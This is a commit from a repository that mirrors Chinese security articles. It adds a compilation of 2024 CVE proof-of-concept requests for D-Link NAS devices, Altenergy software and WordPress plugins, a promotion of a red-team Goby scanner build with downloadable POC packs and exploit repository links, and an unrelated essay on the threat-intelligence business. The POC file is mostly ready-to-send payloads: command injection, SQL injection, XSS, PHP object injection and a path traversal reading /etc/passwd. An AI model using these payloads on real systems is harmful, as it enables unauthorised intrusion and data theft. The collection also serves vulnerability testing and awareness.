admin/wxvl
1
0
Fork 0
mirror of https://github.com/gelusus/wxvl.git synced 2025-06-08 22:17:03 +00:00
Code Issues Packages Projects Releases Wiki Activity

Goby2024红队版工具分享,附2024年漏洞POC下载、威胁情报的尴尬:是个好能力,但不是个好生意!、2024年wordpress、d-link等相关的多个cve漏洞poc、

Browse Source
This commit is contained in:
test 2024-11-24 16:11:29 +00:00
parent a8a7c2b3f7
commit 5e32e8b448
4 changed files with 417 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
data.json
View File

@ -494,5 +494,8 @@
"https://mp.weixin.qq.com/s?__biz=MzkxNTY3MTE5MA==&mid=2247485530&idx=1&sn=b84e14ab32e6680977a4cf8306e0387e": "使用未知技术发现多个 XSS 漏洞",
"https://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247614242&idx=1&sn=e30b1710946dd50ec45296d7c2a8ecff": "通过 API 配置错误和逻辑漏洞实现账户接管",
"https://mp.weixin.qq.com/s?__biz=MzU2MDE2MjU1Mw==&mid=2247485970&idx=1&sn=8448a8df8be78c94494b298d878c2e8a": "团队首个系列课程开班系统0day安全-IOT设备漏洞挖掘",
"https://mp.weixin.qq.com/s?__biz=MzUyMTE0MDQ0OA==&mid=2247493842&idx=1&sn=56b5e7020601e1445bf2b6b280657435": "发现Web API漏洞居然能赚到400w刀看懂这本书你也可以"
"https://mp.weixin.qq.com/s?__biz=MzUyMTE0MDQ0OA==&mid=2247493842&idx=1&sn=56b5e7020601e1445bf2b6b280657435": "发现Web API漏洞居然能赚到400w刀看懂这本书你也可以",
"https://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247495953&idx=1&sn=ea2dfd3fc4c7933ad3e1aa98c2c541e9": "Goby2024红队版工具分享附2024年漏洞POC下载",
"https://mp.weixin.qq.com/s?__biz=MzAxOTk3NTg5OQ==&mid=2247491674&idx=1&sn=62545629199e7669f3555330c6303e65": "威胁情报的尴尬:是个好能力,但不是个好生意!",
"https://mp.weixin.qq.com/s?__biz=MzkyOTQzNjIwNw==&mid=2247490042&idx=1&sn=04e5e7e89b24ef9eb1888ccf83229af0": "2024年wordpress、d-link等相关的多个cve漏洞poc"
}

102
doc/2024年wordpress、d-link等相关的多个cve漏洞poc.md Normal file
View File

@ -0,0 +1,102 @@
# 2024年wordpress、d-link等相关的多个cve漏洞poc
棉花糖fans 2024-11-24 12:14
##
## ⚠️ 漏洞
### ✅ CVE-2024-10914
**在D-Link DNS-320、DNS-320LW、DNS-325和DNS-340L中发现的漏洞版本直到20241028**
```
GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1
```
### ✅ CVE-2024-11305
**在Altenergy Power Control Software中发现的关键漏洞版本直到20241108**
```
POST /index.php/display/status_zigbee HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Connection: close
date=2024-11-06%' UNION ALL SELECT 11,CHAR(113)CHAR(75,101,86,69,115,83,113,89,100,122,121,102,83,83,113,86,84,112,100,103,69,75,80,117,88,109,83,105,89,116,110,120,76,84,73,109,115,100,83,107)CHAR(113,118,98,98,113),11-- wPIB
```
### ✅ CVE-2024-10793
**WP Security Audit Log插件检测 一个允许注入恶意脚本的XSS漏洞。.**
```
curl -X POST 'http://example.com/wp-admin/admin-ajax.php' \
     -d 'action=destroy-sessions&user_id=<script>alert("XSS found windz3r0day")</script>'
```
### ✅ CVE-2024-11199
**通过插件的rescue_progressbar短代码进行的存储跨站脚本攻击**
```
[rescue_progressbar visibility='foo" onclick="alert(/XSS/)"']
```
### ✅ CVE-2024-11381
**通过插件的ch_registro短代码进行的存储跨站脚本攻击**
```
[ch_registro note='"onmouseover="alert(/XSS/)"']
```
### ✅ CVE-2024-43919
**YARPP <= 5.30.10 - 缺少授权
该漏洞允许未经授权访问以修改展示类型。.
```
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com
```
### ✅ CVE-2024-52433
**My Geo Posts Free <= 1.2 - 未经认证的PHP对象注入**
```
GET / HTTP/2
Host: wp-dev.ddev.site
Cookie: mgpf_geo_coockie=TzoyMDoiUEhQX09iamVjdF9JbmplY3Rpb24iOjA6e30=
```
### ✅ CVE-2024-9935
**Elementor页面构建器的PDF生成插件 <= 1.7.5 - 未经认证的任意文件下载**
```
GET /elementor-84/?rtw_generate_pdf=true&rtw_pdf_file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Priority: u=0, i
```
## ▶▶▶ 免责声明
仅用于教育目的。在未获得明确许可的情况下对系统或网站使用这些漏洞是非法的。作者对任何使用这些信息所产生的后果不负责任。
##  广告
全网最强大的网络安全资源大全:[棉花糖会员站介绍(24年10月4日版本)](http://mp.weixin.qq.com/s?__biz=MzkyOTQzNjIwNw==&mid=2247489356&idx=1&sn=b748fb12a8220965758983ddc05baaad&chksm=c208d00cf57f591aaca9a8c2a8507f9ec6fa07457598007a61c93e425b5248bc5a4d0e8b6e70&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_png/lic4LrsB27ntZqXOIfzTDcpXR1rrYALUMbiahn8ibv3KD3tZaNPwo9VpqicdkHwQ7RfXiaUkmzABwibVL5Hicia6zQ99Ww/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/lic4LrsB27ntZqXOIfzTDcpXR1rrYALUMbtqkusQicwPaib5r171YAyMBSd9OTbJxvLcdszqH77K5G9j9uiaibuLib6w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/lic4LrsB27ntZqXOIfzTDcpXR1rrYALUMeXmDyAEswoxDMPdicGKeYZ3pY7DxG6A4aOvLC2VRJqPdLV0VFdyTYNw/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/lic4LrsB27ntZqXOIfzTDcpXR1rrYALUM373ibicylzZDjBCAKKKMxXbzRSSBsyTgQQK9dOlgmJQna0O41RjvsQgQ/640?wx_fmt=png&from=appmsg "")
**☟上下滑动查看更多**

129
doc/Goby2024红队版工具分享,附2024年漏洞POC下载.md Normal file
View File

@ -0,0 +1,129 @@
# Goby2024红队版工具分享附2024年漏洞POC下载
仙草里没有草噜丶 泷羽Sec 2024-11-24 14:42
##### ~ 我如约而至,你恰好在场 ~
[【CTF】CTF-OS一个专门为CTF设计的操作系统](http://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247491177&idx=1&sn=3fdef7cf2e312f11c2655561e91b9f20&chksm=ceb28564f9c50c7271bac98b1c086b71382976815f0cb5978fbd78caec06501dcd4b65eb70c2&scene=21#wechat_redirect)
Goby是基于网络空间映射技术的下一代网络安全工具通过为 目标网络 建立全面的资产知识库生成网络安全事件和漏洞的应急响应。Goby 提供最全面的资产识别。Goby拥有预置超过10万条规则识别引擎对硬件设备和 软件业务系统 进行自动识别分类,全面分析 网络中存在的业务系统Goby提供最快的对目标影响最小的扫描体验通过极轻的传输快速分析端口对应的协议信息。
除了Goby预设的漏洞Goby还提供了可定制的漏洞扫描框架并激励大量网络安全从业者贡献POC确保持续的应急响应能力。
2024Goby红队版POC和库下载
```
https://pan.quark.cn/s/1d9b863659ab
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUcdNpoQuicYfhaq4b1GxxXuZf0WL8oX5RKTwTL8K8AWRZM4g8HVibLMow/640?wx_fmt=png&from=appmsg "")
image-20241124222134366
找到exe程序
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUvVtdZ4XhA3icPdmLQaHnhktFpT9wibeTPzHYuA4K6ribeHUTs5o4xJT3Q/640?wx_fmt=png&from=appmsg "")
image-20241124222221944
双击运行即可
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUqG587LSCQek2HS0yOsssXB42g6LOU1gdJ6TJ7h4uEht5GcC8Empib0w/640?wx_fmt=png&from=appmsg "")
image-20241124220658986
Goby已导入1490个POC。2024年新POC需要自行导入部分存在重复需要自行去重。
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUEVTmtqPNGhzibJynEiaFX8d6744FA418JmzosoYEfibBLcH5N7lxPCdGg/640?wx_fmt=png&from=appmsg "")
image-20241124220751731
漏扫测试
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUp3I9sy7c0T6Ym3p3eDCGw2NzjKxw8Qr8mDaESF44pktl9hvfUSe6QA/640?wx_fmt=png&from=appmsg "")
2024年新POC截图约1300个
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUQcvSd47tpUiapnbSJz2RqkYEA615EJlibl4flNLgoz9Eic1xwu3Iu8rkw/640?wx_fmt=png&from=appmsg "")
image-20241124220427589
#### 其他POC库
1、exploit-db一个专注于公开漏洞利用的在线平台
```
https://www.exploit-db.com/
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUYJfxfM05TxtQKC0uNy5GBZdETwdhP665CY73JhXQe1PE95No3GJlsQ/640?wx_fmt=png&from=appmsg "")
image-20241124222727816
2、POC&EXP仓库、hvv弹药库、Nday、1day
```
https://github.com/DawnFlame/POChouse
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUxNawyuajgqFlSQh7wSgJgIFJrricKjyFtGUicqLOVVsHqDyRzibxYq8qA/640?wx_fmt=png&from=appmsg "")
image-20241124222826727
3、PeiQi-WIKI-POC佩奇文库貌似不再更新了
```
https://peiqi.wgpsec.org/wiki/webapp/
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUKNSGMD9N0jlAz6o5grRXMzsqAEUzce6YRlbXJfLMe6MCXy8KQCicicAQ/640?wx_fmt=png&from=appmsg "")
image-20241124222956375
4、各种漏洞PoC、ExP的收集或编写
```
https://github.com/coffeehb/Some-PoC-oR-ExP
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUibBPEY6xIPMIwLFMq55btrKXxVgOpqt7ica3ZecwStgUSEWNO4OW3cQA/640?wx_fmt=png&from=appmsg "")
image-20241124223011930
5、Awesome-POC一个漏洞POC知识库 目前数量 1000+
```
https://github.com/Threekiii/Awesome-POC
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUp9iczbm8v1cKHn880mYBlDBvxJcVpPa3EMf6C8hf79JRtia3Z910a7yw/640?wx_fmt=png&from=appmsg "")
image-20241124223026109
6、HVV2024-POC收集整理漏洞EXP/POC,大部分漏洞来源网络目前收集整理了900多个poc/exp
```
https://github.com/haxsscker/HVV2024-POC
```
![](https://mmbiz.qpic.cn/mmbiz_png/5975bXHXfWHChmWibJTynbJrDBcY3PdcUsDIcxnY0K5DlDSJOViaP9mtWHCAn3UL1cibbdW1wyuD8ec6EbyBxr1oA/640?wx_fmt=png&from=appmsg "")
image-20241124223120206
#### 往期介绍
[ATK&CK红日靶场二Weblogic漏洞利用域渗透攻略](http://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247495915&idx=1&sn=020b2f604f3c234afc5e660021041671&chksm=ceb16be6f9c6e2f0ce6a52b837b11c17e97c4ad4d7df5c92f52f3c5f0816514d88f9b63d5367&scene=21#wechat_redirect)
[谁的能拒绝这样一款终端呢?](http://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247495843&idx=1&sn=4a73d8acc9ecc0c696c18cb2cce706fa&chksm=ceb16baef9c6e2b897aae723768696f5bca42eb9d59525f060954e903ca879eff7b5da213bef&scene=21#wechat_redirect)
[24年6月版本AWVS激活AWVS漏洞扫描工具安装以及基本使用教程](http://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247493143&idx=1&sn=451a5ee39bbf8109362bbbc5c540f4cc&chksm=ceb17d1af9c6f40cfe0ff9d94ed1c3cd085af8368cd9a35b811638322a31ccb91ff9c397caff&scene=21#wechat_redirect)
[【信息收集】24年11月最新灯塔安装教程以及基本使用](http://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247493111&idx=1&sn=237cff39bbf052614de7bdfc04ac116b&chksm=ceb17efaf9c6f7ecb9ab82ed8b2896b42e62b031c6b6368ebd67a47ca2de6203a30fdc88c99b&scene=21#wechat_redirect)
[从零开始学SQL注入sql十大注入类型技术解析与实战演练](http://mp.weixin.qq.com/s?__biz=Mzg2Nzk0NjA4Mg==&mid=2247483856&idx=1&sn=cf4878d2cb5bd267f4b2d5b065dfa732&chksm=ceb29addf9c513cb453b27da25faa1cf4d5a016b6b9bb3c0057da1afacc825a36f55d2fa9923&scene=21#wechat_redirect)

182
doc/威胁情报的尴尬:是个好能力,但不是个好生意!.md Normal file
View File

@ -0,0 +1,182 @@
# 威胁情报的尴尬:是个好能力,但不是个好生意!
原创 晓兵Jason 锐安全 2024-11-24 14:24
如果加星标,可以及时收到推送
《安全晓说》第
65
篇,
锐安全总第
294
篇原创
本文
1265
字,阅读时长约
4
分钟
威胁情报生意
,今天
可以了解以下内容:
【1】威胁情报的商业价值不高
【2】威胁情报的产品不值钱
【3】威胁情报的生态发展没动力
【4】威胁情报生意应该怎么做
![](https://mmbiz.qpic.cn/mmbiz_png/Fms1OiaYewPh3x0qgfYJc4OlyqAM94frFbPucnlNicbAEfQBUiadH22Tjm93pUGLZzhvficphibRkFOYZicvTkMPePyQ/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/mmbiz_png/kDwCb2n2EHROe2z7z5LIePNCmrD5yVuuGia25dnjFqjljE6ODyEibQZcng4rkYrIEQlUuuopu4v9P0zyPuibDMFjg/640?wx_fmt=png&from=appmsg "")
不是每种好能力都是好生意,威胁情报就面临着这样的尴尬。
威胁情报概念从2013年开始出现发展了十年。国际市场规模已经超过600亿元人民币通常中国市场占全球市场的10%要说也该有60亿的市场但实际上只有不到10亿的市场规模。
这也说明,威胁情报在中国并不是一个好生意。
因为站在商品的角度来看,目前国内威胁情报的“商业价值”不高、威胁情报的“产品”不值钱、威胁情报的“生态发展”没动力。
**【1】**
![](https://mmbiz.qpic.cn/mmbiz_png/Nd6CzgGWaa0eJeiawAhGicwhpicly0MVoyvfoYkYyvaqy787hwGEtyaMfB74t8oiaIO4BgEpAPoav2bhQ4wlic4rvMw/640?wx_fmt=png "")
**威胁情报的商业价值不高**
国际知名商业咨询机构高德纳Gartner对威胁情报是这样的定义的威胁情报是基于证据的知识包括上下文、机制、指标、影响和可操作的建议涉及资产的现有或新出现的威胁或危害可用于为主体应对该威胁或危害的决策提供信息。
这是技术化的定义,从技术角度来看,威胁情报的确是个很有用的能力。
但是从商业角度来看,威胁情报的本质就是“有价值的威胁扩展信息”。但是价值是一个主观概念,它因时间、因客户而异,因此威胁情报价值的“客观确定”就成了大问题。
从商业价值来看,威胁情报时间越长越不值钱,离客户越远越不值钱。
目前的威胁情报离客户还太远。
**【2】**
![](https://mmbiz.qpic.cn/mmbiz_png/Nd6CzgGWaa0eJeiawAhGicwhpicly0MVoyvfoYkYyvaqy787hwGEtyaMfB74t8oiaIO4BgEpAPoav2bhQ4wlic4rvMw/640?wx_fmt=png "")
**威胁情报的产品不值钱**
要想规模化复制,当然厂商都希望威胁情报是一个产品。
只要是产品,就需要有一个相对客观的价值认定,最后,威胁情报就只能用种类和数量进行定价。
于是产品化团队的KPI就必然变成不断增加威胁情报的种类和数量这就回到了上面提到的逻辑因为你离客户远所以商业价值客户感觉不高。
你费劲堆的数量,也会随着时间的流逝而价值递减。
**【3】**
![](https://mmbiz.qpic.cn/mmbiz_png/Nd6CzgGWaa0eJeiawAhGicwhpicly0MVoyvfoYkYyvaqy787hwGEtyaMfB74t8oiaIO4BgEpAPoav2bhQ4wlic4rvMw/640?wx_fmt=png "")
**威胁情报的生态发展没动力**
有人说,我们一起建立一个威胁情报生态怎样?
这想法很好,但是,国内安全市场从来就没有过“生态”这种物种,所以我就在想:威胁情报生态建立的难点到底在哪儿?
生态建立依赖于交易与交换。每家威胁情报都有普通的低价值情报如样本、URL、域名等也有独有的高价值情报如POC、事件漏洞等。
这些独有的高价值情报本身就是各家威胁情报的核心卖点,大家交易的意愿极低,而低价值情报大家又都能自己收集,因此也不用交易。
假如高价值的威胁情报大家愿意交易,也会出现“恶意交易”的情况。
举个例子假设高价值情报你的生产成本是500万由于威胁情报是一个商品因此你最多定价50万。
而花了50万买情报的厂商他的成本就只有50万因此它可以5万块卖给下一家以此类推。
因此,高价值的情报你只要卖出去一份,很有可能这就是最后一份。
所以,大家建生态的动力是严重不足的。****
**【4】**
![](https://mmbiz.qpic.cn/mmbiz_png/Nd6CzgGWaa0eJeiawAhGicwhpicly0MVoyvfoYkYyvaqy787hwGEtyaMfB74t8oiaIO4BgEpAPoav2bhQ4wlic4rvMw/640?wx_fmt=png "")
**威胁情报生意应该怎么做?**
我的观点是:威胁情报最好是一个服务,而不要是一个产品,而目前业内主流的威胁情报厂商,都在把威胁情报往“产品”的方向上演进。
最好的方式,是把通用的威胁情报,以服务的方式与客户的场景进行结合,最终按效果付费,而不是按不断增长的数量付费。
或者,把威胁情报能力当成安全运营的一部分,帮助客户构建一个自己的威胁情报中心,而不是卖给客户一个通用的威胁情报盒子。
如果想建威胁情报生态除了要有一个大的威胁情报池之外还需要做好场景化的威胁情报SDK进行行业赋能和价值化输出而不是只输出数量。
威胁情报,卖的不应该是粮食而是酒。
![](https://mmbiz.qpic.cn/mmbiz_png/kDwCb2n2EHROe2z7z5LIePNCmrD5yVuudv2lrnQ9mvKVVDj9lIeZr1lkU6iaoqfnMoDBr59x14AzkB2fLz6iadUg/640?wx_fmt=png&from=appmsg "")
<table><tbody><tr><td width="557" valign="top" style="word-break: break-all;"><span style="font-size: 14px;"><strong><span style="font-family: 楷体;">恭喜你,又看完了一篇文章。从今天起,<strong>和我一起洞察安全本质</strong>!这里是锐安全,今天就到这里,咱们<span style="color: red;">下次</span>再见!</span></strong></span></td></tr></tbody></table>
> ****
**欢迎来到安全的大航海时代!**
如果对我描述的安全世界感兴趣,可以翻
翻“没有名人作序和题词”的我为你写的
一本“纯粹的安全认知之书”:
![](https://mmbiz.qpic.cn/mmbiz_png/kDwCb2n2EHS0vv41yEicHjFP5icdU8zXcLcFicpic0hmr6Bickgwpoy3b4SbicRuDiaMiac5w8vCmrSgjQFbHKB7ibDPiaMA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/mmbiz_png/kDwCb2n2EHROe2z7z5LIePNCmrD5yVuuluwiaX9Xx7NkVMddeTq3ePSPZ71sVV60ibsG4juUlhbr664ff21ruksw/640?wx_fmt=png&from=appmsg "")
点击文末【**阅读原文**】,看到一个完整的安全系统
end
![](https://mmbiz.qpic.cn/mmbiz_png/6SUs3WHn8P9QVFXd4lu03am0PtsHHPDtib3xhEFpJJw1TAbtMv0hrjSVKKgWm72fdhsPL6RbEbHZGTsiaFTiaxTYQ/640?wx_fmt=png "")
![](https://mmbiz.qpic.cn/mmbiz_png/cXxu8rO9aeEoLicH7cEMZmicpEDhJicEicARW2EAzCkz4ClBBjTq0PvkSrINBsGDtfoSUsUxWKy1lXj5C6gvSfJLBA/640?wx_fmt=png "")
**如果你对本文有任何建议,**
**欢迎联系我改进;**
**如果本文对你有任何帮助,**
**欢迎****分享****、点赞和在看**
**如果心生欢喜,不如做个长期朋友:)**
       
**参考资料:**
[1]摩澜数智研究中心.2022年全球威胁情报平台市场规模到达到了649.84亿元人民币2024年11月14日.https://caifuhao.eastmoney.com/news/20241114114314764010330
[2]斯元商业咨询.威胁情报市场正在兴起,2023-07-28.https://baijiahao.baidu.com/s?id=1772646077330686564&wfr=spider&for=pc
题图:威胁情报
题图创作者晓兵与AI小助手
算法提供FLUX